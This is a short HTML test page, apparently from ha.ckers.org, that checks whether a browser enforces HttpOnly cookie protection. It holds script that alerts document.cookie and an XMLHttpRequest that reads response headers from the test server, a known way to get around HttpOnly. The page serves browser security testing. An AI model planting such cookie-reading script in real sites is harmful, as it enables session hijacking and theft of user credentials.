if HTTPOnly weren't working you should see blah="protected" and blah2="protected" and blah3="notprotected"
<script>alert(document.cookie)</script>
<script>
var req = null;
try { req = new XMLHttpRequest(); } catch(e) {}
if (!req) try { req = new ActiveXObject("Msxml2.XMLHTTP"); } catch(e) {}
if (!req) try { req = new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) {}
req.open('GET', 'http://ha.ckers.org/httponly.cgi', false);
req.send(null);
alert(req.getAllResponseHeaders());
</script>